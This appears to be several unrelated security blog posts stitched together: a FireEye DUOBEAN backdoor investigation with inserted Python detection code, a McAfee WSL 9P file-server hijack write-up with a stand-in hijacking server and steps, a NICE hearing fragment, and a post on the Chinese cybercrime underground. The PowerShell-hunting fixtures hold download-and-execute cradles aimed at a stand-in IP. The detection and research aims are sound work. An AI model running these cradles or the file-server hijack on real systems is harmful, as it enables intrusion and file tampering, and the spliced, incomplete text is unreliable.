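from statistics import mean, pstdev
from typing import Dict, List, Optional


@dataclass(frozen=True)
class Flow:
    ts: datetime      # flow start
    src: str          # internal host
    dst: str          # external destination
    dport: int
    out_bytes: int    # client -> server
    in_bytes: int     # server -> client


def _constructed_flows() -> List[Flow]:
    base = datetime(2020, 2, 10, 8, 0)
    flows = []
    # six internal hosts, one ~517-byte TLS Client Hello every 15 minutes, no response
    for i in range(6):
        for k in range(8):
            flows.append(Flow(base + timedelta(minutes=15 * k, seconds=i),
                              f"10.0.1.{11 + i}", "203.0.113.45", 443, 517, 0))
    # one host browsing a benign site: irregular timing, real response data
    for off, ob, ib in [(0, 1200, 48000), (3, 900, 150000), (11, 2200, 32000), (40, 600, 9000)]:
        flows.append(Flow(base + timedelta(minutes=off), "10.0.1.20", "198.51.100.10", 443, ob, ib))
    return flows


SAMPLE_FLOWS = _constructed_flows()


def profile(flows: List[Flow]) -> Dict[str, dict]:
    """Per-destination summary: host prevalence, interval regularity, byte profile."""
    by_dst: Dict[str, Dict[str, List[Flow]]] = defaultdict(lambda: defaultdict(list))
    for f in flows:
        by_dst[f.dst][f.src].append(f)
    summary = {}
    for dst, hosts in by_dst.items():
        intervals, outs, ins = [], [], []
        for fl in hosts.values():
            fl.sort(key=lambda f: f.ts)
            # gaps between consecutive flows from the same host to this destination
            intervals += [(b.ts - a.ts).total_seconds() for a, b in zip(fl, fl[1:])]
            outs += [f.out_bytes for f in fl]
            ins += [f.in_bytes for f in fl]
        cv: Optional[float] = None
        if len(intervals) > 1 and mean(intervals) > 0:
            cv = pstdev(intervals) / mean(intervals)  # 0.0 = perfectly regular cadence
        summary[dst] = {
            "hosts": len(hosts),
            "flows": len(outs),
            "interval_mean_s": mean(intervals) if intervals else None,
            "interval_cv": cv,
            "out_bytes_mean": mean(outs),
            "in_bytes_total": sum(ins),
        }
    return summary


def suspicious_destinations(summary: Dict[str, dict], max_hosts: int = 10,
                            max_cv: float = 0.1, max_out: int = 2000) -> List[str]:
    """Beacon-like: few hosts, regular cadence, small outbound payloads, nothing coming back."""
    flagged = []
    for dst, s in summary.items():
        if (s["hosts"] <= max_hosts and s["interval_cv"] is not None
                and s["interval_cv"] <= max_cv and s["out_bytes_mean"] <= max_out
                and s["in_bytes_total"] == 0):
            flagged.append(dst)
    return sorted(flagged)


if __name__ == "__main__":
    summary = profile(SAMPLE_FLOWS)
    for dst, s in summary.items():
        print(dst, s)
    print("beacon-like:", suspicious_destinations(summary))
```

The coefficient of variation of the inter-flow interval is the key number: a human browsing session produces a large spread, while a scheduled task produces a value near zero even when the absolute interval differs between malware families. The thresholds are assumptions for this example and should be tuned to the environment's own baseline.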

Given the findings from the hunting investigation, the Managed Defense team immediately informed the customer that further endpoint analysis was going to be performed on the six (6) hosts communicating with the suspicious infrastructure. At the time, the customer was not instrumented with FireEye Endpoint Security, so portable collections were captured for each of the hosts and securely uploaded to the Managed Defense team for analysis.

Further Analysis

Endpoint collections containing Windows file system metadata, Windows Registry, Windows Event Logs, web browser history, and a process listing with active network connections were gathered for Managed Defense analysts.

Windows Event Logs by themselves can have hundreds of thousands if not millions of entries. As an analyst, it’s increasingly important to be specific in what questions you’re looking to answer during endpoint investigations. In this case, we have one leading question to begin our investigation: What application is regularly communicating with our suspicious infrastructure?

Active network connections indicated that the legitimate Windows binary “msiexec.exe” was responsible for the network connection to the suspicious infrastructure. This information was also included in detailed process tracking evidence (EID 4688) from the Windows Event Logs shown in Figure 3.


Figure 3: Windows Event Log detailing suspicious use of “msiexec.exe”

The legitimate application “msiexec.exe” is responsible for command-line installation and modification of Windows Installer packages (*.msi files), and rarely makes network connections. From an analyst’s perspective, the low occurrence of network activity from this binary in standard use raises suspicion of process injection. The parent process in this instance also runs from the %AppData%\Roaming directory, a user-writable location that needs no elevated privileges and is commonly used for malware persistence.

As analysts, we’re confident at this point that malicious activity is occurring on the host. Our line of questioning now transitions from exploring the source of the network traffic to discovering the scope of the compromise on the host. To triage, we use the following line of questioning:

What is it?

For this question, we’re interested in understanding the attacker behavior on the victim computer, specifically the malware in this investigation. This includes functionality and persistence mechanisms used.

With our initial lead being the potential staging directory of %AppData%\Roaming from the Windows Event Log listing, we’ll first look at any files created within a few minutes of “eeclnt.exe”. A Mandiant Redline listing of the files returned from filtering the directory is shown in Figure 4.


Figure 4: Mandiant Redline file listing from potential staging directory, %Appdata%\Roaming

Three (3) suspicious files are returned: “eeclnt.exe”, “MSVCR110.dll”, and “MSVCR110.dat”. These files were uploaded to the FLARE team’s internal malware sandbox, Horizon, for further analysis.

PE file information indicates that “eeclnt.exe” is a legitimate copy of an ESET Smart Security binary with a required import of “MSVCR110.dll”. “MSVCR110.dll” is the Microsoft Visual C++ 2012 runtime library required by applications built with that compiler; because the Windows loader resolves it by name and looks in the application’s own directory before the system directory, a file of that name placed beside the executable wins. In this case, “MSVCR110.dll” was replaced with a malicious loader DLL. When “eeclnt.exe” executes, it imports the malicious “MSVCR110.dll”, which loads the backdoor contained in “MSVCR110.dat” into “msiexec.exe” process memory through process hollowing. This technique is called DLL “sideloading” and is commonly used by attackers to evade detection by having a legitimate, often signed, executable run their malicious code.

After initial triage from a Managed Defense analyst, the backdoor was passed along to our FLARE team to reverse engineer for additional identification of malware functionality and family identification. In this case, the backdoor was previously unseen so the Managed Defense analyst who identified the malware named it DUOBEAN.

How does it persist?

On Windows hosts, malware most commonly persists in one of three ways: Registry “Run” keys, which launch a specified application whenever a specific user (or, for the HKLM hive, any user) logs on to the workstation; Windows Services, long-running background processes typically started at boot; and scheduled tasks, which run an arbitrary command or binary at a designated time or interval.

In this case, by filtering for the sideloaded binary, “eeclnt.exe”, we quickly identified a Windows Service, “Software Update”, created around the file creation timestamp that maintained persistence for the DUOBEAN backdoor.
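The three questions asked so far (which process owns the connection and who spawned it, what was dropped beside it in the staging directory, and which service keeps it alive) can be put to a portable collection programmatically. The Python below is an added example and not Redline or any other FireEye tooling; the process list, connections, file timestamps, service entries, IP addresses, and the lists of user-writable paths and rarely-networked binaries are constructed assumptions modeled on this write-up:

```python
"""Endpoint triage over constructed collection data (process list, active
connections, file listing, services). Added example for this write-up, not
FireEye/Mandiant tooling; every IP, path, PID and timestamp below is made up."""
import ntpath
from dataclasses import dataclass


@dataclass
class Process:
    pid: int
    ppid: int
    image: str


@dataclass
class Connection:
    pid: int
    remote_ip: str
    remote_port: int


@dataclass
class FileEntry:
    path: str
    created: int            # epoch seconds


@dataclass
class Service:
    name: str
    image_path: str


# Assumptions: directories any user can write to, binaries that seldom talk to
# the network on their own, and DLL names frequently used for side-loading.
# Extend all three from your own baseline.
USER_WRITABLE_MARKERS = ("\\appdata\\roaming\\", "\\appdata\\local\\",
                         "\\programdata\\", "\\users\\public\\", "\\temp\\")
RARE_NETWORK_BINARIES = {"msiexec.exe"}
RUNTIME_DLL_NAMES = {"msvcr110.dll"}
SIDELOAD_WINDOW = 5 * 60    # seconds between loader EXE and DLL creation

APPDATA = "C:\\Users\\jdoe\\AppData\\Roaming"
SAMPLE_PROCESSES = [
    Process(4, 0, "System"),
    Process(2104, 1, "C:\\Windows\\System32\\services.exe"),
    Process(812, 612, "C:\\Windows\\System32\\svchost.exe"),
    Process(3988, 2104, APPDATA + "\\eeclnt.exe"),
    Process(4120, 3988, "C:\\Windows\\System32\\msiexec.exe"),
]
SAMPLE_CONNECTIONS = [Connection(812, "198.51.100.20", 443),
                      Connection(4120, "203.0.113.7", 443)]
SAMPLE_FILES = [
    FileEntry(APPDATA + "\\eeclnt.exe", 1580000000),
    FileEntry(APPDATA + "\\MSVCR110.dll", 1580000042),
    FileEntry(APPDATA + "\\MSVCR110.dat", 1580000042),
    FileEntry(APPDATA + "\\Microsoft\\Windows\\Themes\\slideshow.ini", 1570000000),
]
SAMPLE_SERVICES = [
    Service("Software Update", '"' + APPDATA + '\\eeclnt.exe"'),
    Service("Dhcp", "C:\\Windows\\system32\\svchost.exe -k LocalServiceNetworkRestricted"),
]
SUSPICIOUS_IPS = {"203.0.113.7"}


def is_user_writable(path: str) -> bool:
    p = path.lower()
    return any(marker in p for marker in USER_WRITABLE_MARKERS)


def triage(processes, connections, files, services, suspicious_ips):
    """Return findings in the order the investigation asks its questions."""
    by_pid = {p.pid: p for p in processes}
    by_dir = {}
    for f in files:
        by_dir.setdefault(ntpath.dirname(f.path).lower(), []).append(f)
    findings, loaders = [], {}

    # 1. Which process owns the connection, and what spawned it?
    for c in connections:
        if c.remote_ip not in suspicious_ips:
            continue
        proc = by_pid.get(c.pid)
        parent = by_pid.get(proc.ppid) if proc else None
        reasons = []
        if proc and ntpath.basename(proc.image).lower() in RARE_NETWORK_BINARIES:
            reasons.append("binary rarely makes network connections: suspect injection/hollowing")
        if parent and is_user_writable(parent.image):
            reasons.append("parent executes from a user-writable directory")
            loaders[parent.image.lower()] = parent
        findings.append({"type": "suspicious_connection", "pid": c.pid,
                         "image": proc.image if proc else None,
                         "parent": parent.image if parent else None,
                         "remote": f"{c.remote_ip}:{c.remote_port}", "reasons": reasons})

    # 2. Staging directory: runtime DLLs created within minutes of the loader EXE.
    for image in loaders:
        entries = by_dir.get(ntpath.dirname(image), [])
        exe = next((f for f in entries if f.path.lower() == image), None)
        if exe is None:
            continue
        for f in entries:
            if (ntpath.basename(f.path).lower() in RUNTIME_DLL_NAMES
                    and abs(f.created - exe.created) <= SIDELOAD_WINDOW):
                findings.append({"type": "sideload_candidate", "exe": exe.path, "dll": f.path})

    # 3. Persistence: services whose image path is the loader or any user-writable path.
    for s in services:
        img = s.image_path.lower().strip().strip('"')
        if any(loader in img for loader in loaders) or is_user_writable(img):
            findings.append({"type": "service_persistence", "service": s.name,
                             "image_path": s.image_path})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_PROCESSES, SAMPLE_CONNECTIONS, SAMPLE_FILES,
                          SAMPLE_SERVICES, SUSPICIOUS_IPS):
        print(finding)
```

triage() returns the msiexec.exe connection attributed to its eeclnt.exe parent in %AppData%\Roaming, the MSVCR110.dll created 42 seconds after the loader, and the “Software Update” service pointing at the same loader. The service check stands on its own: a service image path under a user profile is worth a look even when no network lead exists. The .dat payload is not caught by name; the same time-window query finds it once you drop the name filter.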

How did it get there?

This can be one of the more challenging questions to answer in the investigative world. With limited data retention times and rolling log data, the initial vector is not always easily discerned.

In this case, pivoting to look at browser history and file system modification around the time the DUOBEAN backdoor was created on the victim endpoint led us to our answers. Mandiant Redline output to detail the timeline of initial compromise is displayed in Figure 5.


Figure 5: Mandiant Redline output containing the host initial compromise timeline

The timeline of events shows that the user was phished via their personal Gmail account, opening a password-protected CHAINLNK attachment delivered through a OneDrive link embedded in the email. Malicious PowerShell commands observed in the Windows Event Logs following that activity (Figure 6) indicate that CHAINLNK executed successfully and downloaded DUOBEAN.


Figure 6: Malicious CHAINLNK PowerShell commands observed in Windows Event Logs
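Because the CHAINLNK commands appear only in the figure, here is an added Python example (not FireEye detection content) of the kind of query an analyst runs over PowerShell script block logging (Event ID 4104) and process creation (Event ID 4688) command lines to surface a download-and-execute stage. The events, host names, URL and regular expressions are constructed assumptions; the encoded launcher is built in the script from a plaintext payload so the decoding path is exercised honestly:

```python
"""Hunting download-and-execute patterns in PowerShell script block (4104) and
process creation (4688) events. Added example for this write-up; the events,
hosts, URL and patterns are constructed, not the engagement's real logs."""
import base64
import re

# Assumption: these regexes approximate common cradle/evasion tells; tune them.
PATTERNS = {
    "download_cradle": re.compile(
        r"(Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer)", re.I),
    "inline_execution": re.compile(r"(\bIEX\b|Invoke-Expression)", re.I),
    "encoded_command": re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(?:p|xecutionpolicy|x)\s+bypass", re.I),
    "user_writable_drop": re.compile(
        r"\\AppData\\(Roaming|Local)\\|\\Temp\\|\$env:APPDATA|\$env:TEMP", re.I),
}
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)

# Constructed sample: the launcher carries its cradle as a UTF-16LE base64 blob.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/update.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"event_id": 4688, "host": "WKS-017",
     "text": "powershell.exe -nop -w hidden -ep bypass -enc " + ENCODED},
    {"event_id": 4104, "host": "WKS-017",
     "text": "(New-Object Net.WebClient).DownloadFile('http://203.0.113.7/eeclnt.exe', "
             "\"$env:APPDATA\\eeclnt.exe\"); Start-Process \"$env:APPDATA\\eeclnt.exe\""},
    {"event_id": 4104, "host": "WKS-017",
     "text": "Get-ChildItem C:\\Logs | Where-Object { $_.Length -gt 1MB } | Sort-Object LastWriteTime"},
    {"event_id": 4688, "host": "WKS-022",
     "text": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"},
]


def decode_encoded_command(cmdline: str):
    """Return the plaintext of a -EncodedCommand argument (UTF-16LE base64), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(text: str):
    """Match the patterns against the raw text plus any decoded payload."""
    decoded = decode_encoded_command(text)
    haystack = text + ("\n" + decoded if decoded else "")
    hits = [name for name, rx in PATTERNS.items() if rx.search(haystack)]
    return hits, decoded


def hunt(events, min_hits=2):
    """Flag events with at least min_hits tells; one tell alone is too noisy."""
    findings = []
    for ev in events:
        hits, decoded = score_event(ev["text"])
        if len(hits) >= min_hits:
            findings.append({"event_id": ev["event_id"], "host": ev["host"],
                             "hits": hits, "decoded": decoded})
    return findings


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

hunt() flags the encoded launcher (once the UTF-16LE payload is decoded, the cradle and IEX tells become visible) and the script that drops an executable into %APPDATA%, while the log-housekeeping one-liner and the administrator’s -ExecutionPolicy Bypass inventory script fall below the threshold. Requiring two tells rather than one is what keeps routine administrative scripts out of the queue; tune the pattern list to your environment.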

No further activity was identified from this host based on the investigative evidence provided, and Managed Defense continued to scope the environment for additional indicators of compromise. This specific threat actor was detected early in the attack lifecycle which limited the impact of the threat actor and enabled Managed Defense to guide the victim organization through a quick remediation.

Summary

The China-nexus threat actor activity detailed above expanded to multiple customers, and eventually escalated to a Managed Defense Community Protection Event (CPE). CPEs are rapidly progressing campaigns targeting multiple customers with substantial potential for business impact. Managed Defense customers are immediately notified of CPE activity, indicators are deployed to monitor customer products, and the Managed Defense Consulting team provides insight on how to mitigate risk.

Regardless of the scale of your investigation, time is of the essence. Drowning under investigative data without a clear line of questioning buys attackers additional time to impose their agenda on your organization. Remember, products and intelligence are components of your security practice, but expertise is required in order to transform those inputs into an effective response.

Knock, Knock – Who’s There?

A Windows Linux Subsystem Interop Analysis

Following our research in Evil Twins and Windows Linux Subsystem, interoperability between the different WSL versions caught our attention. The protocol and mechanism used to manage files to and from WSL is a must-know for Blue and Red Teams: research here will yield new ways of executing known techniques to achieve tactics such as Persistence, Defense Evasion and Execution, among others.

It is important (even if not seen in regular arsenals today) to understand how to protect, detect and react to this attack surface, which could become widespread in a future where WSL is a de-facto component of every enterprise machine.

Since Windows 10 version 1903, it is possible to access Linux files from Windows using the \\wsl$\[DistroName] path syntax, which is backed by the 9P protocol. During our research, we found some design issues in WSLv1 that were carried over to WSLv2, even though the core component differs. The main issue is the lack of any security control on the WSL communication object: whoever owns the instance also owns the listening Plan 9 file system server. At first sight this may look obvious, but once you control that communication channel, different ways of abusing the data sent back and forth between Windows and the container begin to emerge.

It is important to mention that when running inside an isolated environment like WSLv2, activity that does not cross the boundary may remain hidden from security products, but once an attempt to execute a malicious application on the Windows side is detected, the scanning mechanism provided by MVISION Endpoint and ENS will trigger to protect the host. MVISION EDR provides visibility and detection for some of these artifacts. At the end of this article, we list the objects to monitor in order to detect such cases in your organization.

Potential uses for Red Teams and researchers:

  • Persistence by hiding the real content, especially on WSLv2 where the root folder is a VHDX image.
  • Protocol fuzzing for discovering vulnerabilities on the implementation.
  • Security bypass by using \\wsl$ syntax in applications that have options to disable Network Folders scan and thus, do not consider this as a local path. (McAfee MVision Endpoint will consider this special path).
  • File tampering (the user accesses a file expecting some content, but it is changed during the transfer).

P9 Server Hijack Pre-Requisites:

  • WSL Enabled
  • Same user privileges as the WSL instance
  • A P9 compatible server

In the following sections, P9 (the Plan 9 file system protocol) and 9P (the protocol’s proper name) are used interchangeably.

WSLv1 and P9

In WSLv1 the communication is done over an AF_UNIX socket (a local file) owned by the user running the WSL instance. The socket is created by WSL’s custom init process. Processes on the Windows side reach that socket through a P9 driver that speaks the P9 file system protocol, instead of accessing the files as “Windows local” files.

Note: 9P has several dialects; the ones Windows currently supports are the L and W variants (9P2000.L and 9P2000.W).

A quick look at the strings in init shows that:

  1. The first WSL instance will open the p9 server for that distribution.
  2. Init has an embed server that creates a Unix socket into the distro path.
  3. The Unix socket is used to communicate.
  4. Whenever \\wsl$\ is accessed, P9 driver starts the communication.
  5. A P9 client communicates with the server.

Now, is that fsserver socket file protected? No! That means we can hijack the socket and start our own P9 server in its place (in this case, I used DIOD as the base) and from there… the options are endless: from protocol fuzzers triggering something unexpected, to protection bypasses, to something as simple as serving different content than expected.

To find the fsserver root location programmatically using PowerShell:

From there, the next step is to start our P9 server from inside WSL (assuming the path was provided as the script argument, as shown above):

In this example, the next time we access \\wsl$\Debian, it serves the files from mynewroot.

The below screenshot shows the full procedure using a modified P9 server:

  1. DIOD listening on the local socket.
  2. WSL directory listing before the hijack.
  3. WSL directory listing after the hijack.
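To make the exchange in the list above concrete, the following Python is an added example (not the DIOD server used in the research, and not Microsoft’s P9 driver or init) of the first two 9P messages a client sends when \\wsl$\ is opened, answered by a stand-in server of the kind a hijacker plants on the socket. The message layout follows the published 9P2000.L wire format (little-endian size[4] type[1] tag[2], strings as len[2]+bytes, a qid as type[1] version[4] path[8]); the socketpair transport, the dialects the stand-in accepts and the root qid are assumptions:

```python
"""Minimal 9P2000.L version/attach exchange with a stand-in ("hijacking") server.
Added example for this write-up; not DIOD, not Microsoft's P9 driver or init."""
import errno
import socket
import struct
import threading

TVERSION, RVERSION, TATTACH, RATTACH, RLERROR = 100, 101, 104, 105, 7
NOTAG, NOFID = 0xFFFF, 0xFFFFFFFF
QTDIR = 0x80
SUPPORTED_VERSIONS = {"9P2000.L", "9P2000.W"}   # assumption: dialects the stand-in answers
UNSUPPORTED_ERRNO = errno.ENOSYS                # Rlerror code for anything not implemented


def pstr(b: bytes) -> bytes:
    """9P string: len[2] followed by the bytes."""
    return struct.pack("<H", len(b)) + b


def read_pstr(buf: bytes, off: int):
    (n,) = struct.unpack_from("<H", buf, off)
    return buf[off + 2:off + 2 + n], off + 2 + n


def frame(mtype: int, tag: int, body: bytes) -> bytes:
    """size[4] type[1] tag[2] body; size counts the whole message."""
    return struct.pack("<IBH", 7 + len(body), mtype, tag) + body


def build_tversion(msize: int = 65536, version: str = "9P2000.L") -> bytes:
    return frame(TVERSION, NOTAG, struct.pack("<I", msize) + pstr(version.encode()))


def build_tattach(fid: int, uname: str = "root", aname: str = "", n_uname: int = 0, tag: int = 1) -> bytes:
    body = (struct.pack("<II", fid, NOFID) + pstr(uname.encode())
            + pstr(aname.encode()) + struct.pack("<I", n_uname))
    return frame(TATTACH, tag, body)


def parse_reply(raw: bytes) -> dict:
    """Decode the R-messages this example uses; anything else is returned raw."""
    size, mtype, tag = struct.unpack_from("<IBH", raw, 0)
    if size != len(raw):
        raise ValueError("size field does not match message length")
    body = raw[7:]
    if mtype == RVERSION:
        (msize,) = struct.unpack_from("<I", body, 0)
        version, _ = read_pstr(body, 4)
        return {"type": "Rversion", "tag": tag, "msize": msize, "version": version.decode()}
    if mtype == RATTACH:
        return {"type": "Rattach", "tag": tag, "qid": struct.unpack("<BIQ", body)}
    if mtype == RLERROR:
        return {"type": "Rlerror", "tag": tag, "ecode": struct.unpack("<I", body)[0]}
    return {"type": mtype, "tag": tag, "body": body}


class HijackServer:
    """Answers Tversion and Tattach; every attach lands on this server's root,
    regardless of which distribution the Windows side thinks it is opening."""

    def __init__(self, root_path_id: int = 0x1234, msize: int = 8192):
        self.msize = msize
        self.root_qid = (QTDIR, 0, root_path_id)   # assumed qid for the served root
        self.fids = {}

    def handle(self, raw: bytes) -> bytes:
        _size, mtype, tag = struct.unpack_from("<IBH", raw, 0)
        body = raw[7:]
        if mtype == TVERSION:
            (want,) = struct.unpack_from("<I", body, 0)
            version, _ = read_pstr(body, 4)
            self.msize = min(self.msize, want)       # negotiate down to the smaller msize
            reply = version if version.decode() in SUPPORTED_VERSIONS else b"unknown"
            return frame(RVERSION, NOTAG, struct.pack("<I", self.msize) + pstr(reply))
        if mtype == TATTACH:
            fid, _afid = struct.unpack_from("<II", body, 0)
            self.fids[fid] = "/"                      # the hijacker's root, not the distro's
            return frame(RATTACH, tag, struct.pack("<BIQ", *self.root_qid))
        return frame(RLERROR, tag, struct.pack("<I", UNSUPPORTED_ERRNO))


def recv_msg(sock) -> bytes:
    """Read one length-prefixed 9P message from a stream socket."""
    def exact(n):
        buf = b""
        while len(buf) < n:
            chunk = sock.recv(n - len(buf))
            if not chunk:
                raise ConnectionError("peer closed the 9P channel")
            buf += chunk
        return buf
    head = exact(4)
    (size,) = struct.unpack("<I", head)
    return head + exact(size - 4)


def run_exchange():
    """Client side of what the P9 driver does when \\wsl$\\<distro> is opened,
    against the stand-in server on a socketpair (assumed transport)."""
    client, server = socket.socketpair()
    srv = HijackServer()

    def serve():
        try:
            for _ in range(2):                      # Tversion, then Tattach
                server.sendall(srv.handle(recv_msg(server)))
        finally:
            server.close()

    worker = threading.Thread(target=serve)
    worker.start()
    try:
        client.sendall(build_tversion())
        rversion = parse_reply(recv_msg(client))
        client.sendall(build_tattach(fid=1))
        rattach = parse_reply(recv_msg(client))
    finally:
        client.close()
        worker.join()
    return rversion["version"], rversion["msize"], rattach["qid"]


if __name__ == "__main__":
    print(run_exchange())
```

run_exchange() drives Tversion/Rversion and Tattach/Rattach through the socketpair and returns the negotiated dialect, msize and root qid; every attach lands on the hijacker’s root, which is exactly why a replaced server can hand out mynewroot in place of the distribution’s files. Anything beyond those two messages is answered with Rlerror, and that is also where a protocol fuzzer would start pushing malformed Twalk/Tread requests at the real server.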

While we were working on this, WSLv2 was announced and became available in the latest Windows 10 update. The next question was obvious: can we still do the same, given that the instance now runs a real Linux kernel inside a lightweight Hyper-V virtual machine?

WSLv2 and P9

Now that there is a real Linux kernel, the kernel’s own 9p module is used. The C: drive is mounted over P9 (with rdfd/wdfd file-descriptor arguments) on top of drvfs.

The host is reachable at vsock CID 2, and ports 50000, 50001 and 50002 are used for interop messages and instance control.

Back to work: there are some steps to follow to determine whether we can achieve the same P9 server hijack.

  • Scan the ports open on the WSLv2 instance (a starting point could be modifying the sample Hyper-V socket client code to turn it into a scanner).
    1. Find the instance ID (one option is to check the wslhost.exe command line in Task Manager).
    2. Scan the instance!
    3. Hey! Port 0x405 (1029 decimal) is open; let us knock-knock to find out who is there.
  • P9 server port found… let us go hijack it!
    1. Unlike WSLv1, simply listening on the same port is not possible, unless we find a way around the restrictions (the app/module does not use reuseaddr/reuseport, and the socket cannot be closed from user space).
    2. We cannot kill init nor unload the module serving the files, so our best bet is to close the port from the kernel. At the end of the day, it is our instance and we log in as root.
    3. Let us create a vsock kernel module that will:
      1. List the current vsock sockets.
      2. Close a socket listening on a given port.
    4. Compile the module against the kernel source.
    5. Test it! (Note that some ports are missing from the listing and this should be fixed, but for what we want the output is enough.)
    6. Now we are free to go, but we still need our P9 DIOD server listening on that port over a VSOCK socket. Since `socat` supports this socket type, it is a piece of cake.
  • Access \\wsl$\DistributionName and voilà!

Protection and Detection with McAfee Products

In addition to the WSL-related rules presented in previous posts, McAfee products provide several ways to detect and protect against P9 hijacking:

  • MVISION Endpoint will scan \\wsl$\ even if network scanning is disabled, so from the execution perspective on the Windows side protection still applies.
  • By using Endpoint Security Expert Rules it is possible to block execution from WSL paths.
  • To configure Active Response (WSLv1), follow these steps:
    • Set up a trigger to be notified when the fsserver socket file is deleted:
      • File trigger with condition: “Files name equals fsserver”
    • Enable the Files collector, looking for fsserver modifications:
      • “Files where Files name equals fsserver”

In MVISION EDR (WSLv1), the file collector should be enabled and looking for modifications to the fsserver socket file (condition: files where file name equals “fsserver”).

As a final note, we expect this post to provide new insights for future exploration of these key areas, especially considering that a distribution can be converted between WSLv1 and WSLv2 in place, and both versions will be in common use over the next years.

References:

  1. http://doc.cat-v.org/plan_9/misc/ubiquitous_fileserver/
  2. http://9p.io/magic/man2html/5/intro
  3. https://github.com/chaos/diod/blob/master/protocol.md
  4. https://w4mhi.wordpress.com/complete-hyper-v-socket-client-code/
  5. https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/user-guide/make-integration-service
  6. https://tyranidslair.blogspot.com/2019/07/digging-into-wsl-p9-file-system.html
  7. https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/using-expert-rules-in-ens-10-5-3-to-prevent-malicious-exploits/
  8. https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/the-twin-journey-part-1/


The post Knock, Knock – Who’s There? appeared first on McAfee Blogs.

NICE Director Participates as Witness During U.S. House of Representatives Committee on Science, Space, and Technology Hearing

Rodney Petersen, the Director of the National Initiative for Cybersecurity Education (NICE), participated as a witness during the House Science Subcommittee on Research and Technology hearing on “More Hires, Fewer Hacks: Developing the U.S. Cybersecurity Workforce”. Rodney shared information on NIST’s efforts to energize and promote a robust network and an ecosystem of cybersecurity education, training, and workforce development through the NICE program. Other topics were also highlighted such as the Regional Alliances and Multistakeholder Partnerships to Stimulate (RAMPS) Cybersecurity

How Chinese Cybercriminals Use Business Playbook to Revamp Underground

Preface

Because of its longevity and technical sophistication, the Russian cybercriminal underground has long been the benchmark for threat researchers focused on studying cybercrime tactics and techniques; there is a plethora of publications dedicated to analyzing its economy and hacking forums. However, only a handful of studies have centered on the emerging threats and trends from other, less prominent, cybercriminal undergrounds.

Recent data shows that the Chinese cybercriminal underground’s profits exceeded US$15.1 billion in 2017, while causing more than $13.3 billion worth of damage relating to data loss, identity theft and fraud. Over the years, the McAfee Advanced Programs Group (APG) has observed Chinese non-state threat actor groups gradually transform from small local networks targeting mostly Chinese businesses and citizens to large, well-organized criminal groups capable of hacking international organizations.

The development of commercial-scale exploit toolkits and criminal networks that focus on monetization of malware have amplified the growing risks of cybercrime in the Asia Pacific region to include a DDoS attack against the People’s Bank of China in December 2013, a $1 billion SWIFT hack against Bangladesh Bank in February 2016 and a $60 million theft from Far Eastern International Bank in Taiwan in October 2017, to name just a few.

This blog provides a rare glimpse inside the Chinese cybercriminal underground. Analyzing its current business models and techniques has yielded insights into the drastic changes in its operations, including the tactics and strategies it is borrowing from Russian cybercriminals.

Timeline: The Rise of the Chinese Cybercriminal Underground

China established its first cable connection to the world wide web in 1994, around the same time as cybercrime syndicates from Russia and other emerging cybercriminal undergrounds were executing their first major cybercrimes. Chinese leaders have since prioritized the development and acceleration of Internet technologies and, today, the size of China’s Internet use is massive and unparalleled at 800 million users.

However, this growth in Internet usage is not without irony as it has been accompanied by a significant increase in cybercriminal activity. Despite the Chinese government placing high importance on running one of the world’s most sophisticated Internet censorship systems, local cybercriminals are finding workarounds that contribute to China having one of the fastest growing cybercriminal underground economies.

China’s cybercrime enterprise is large, lucrative and expanding quickly. According to 2018 Internet Development Statistics, China’s cybercriminal underground was worth more than US $15 billion, nearly twice the size of its information security industry. The same Chinese-language source also shows that China’s cybercrime is growing at a rate of more than 30 percent a year. An estimated 400,000 people work in underground cybercriminal networks.

Changes in Tactics, Techniques and Procedures

In order to quickly scale up their businesses and maximize return on investment (ROI), Chinese cybercriminals have continuously adapted their tactics, techniques and procedures (TTPs). One significant change is that Chinese cybercriminals are slowly moving away from a high degree of one-to-one engagement through China’s popular QQ instant messaging platform to establishing more formal cybercriminal networks. These networks use centralized advertising and standard service processes similar to Russian and other more sophisticated cybercriminal underground forums. Cybercriminals can access these centralized networks hosted on the deep web to post their products and services. A large amount of stolen data is available via automated services, where carders can order the credit and debit card information they want without having to interact with another user. With regard to hacking services, Chinese cybercriminals also offer modules for prospective clients to fill out their service requests, including types of attacks, target IP addresses, desired malware or exploit toolkits and online payment processing. By establishing a standardized model of sale, Chinese cybercriminals can expand their activity quickly without incurring additional overhead costs.

Attacks-as-a-service

Similar to other prominent cybercrime underworlds, Chinese cybercriminal underground markets are focused on providing excellent customer service. Many of the hackers expand their working hours to include weekends and even provide 24/7 technical support for customers who do not have a technical background. Distributed Denial of Service (DDoS) botnets, traffic sales, source code writing services, email/SMS spam and flooding services are available on the Chinese black markets.

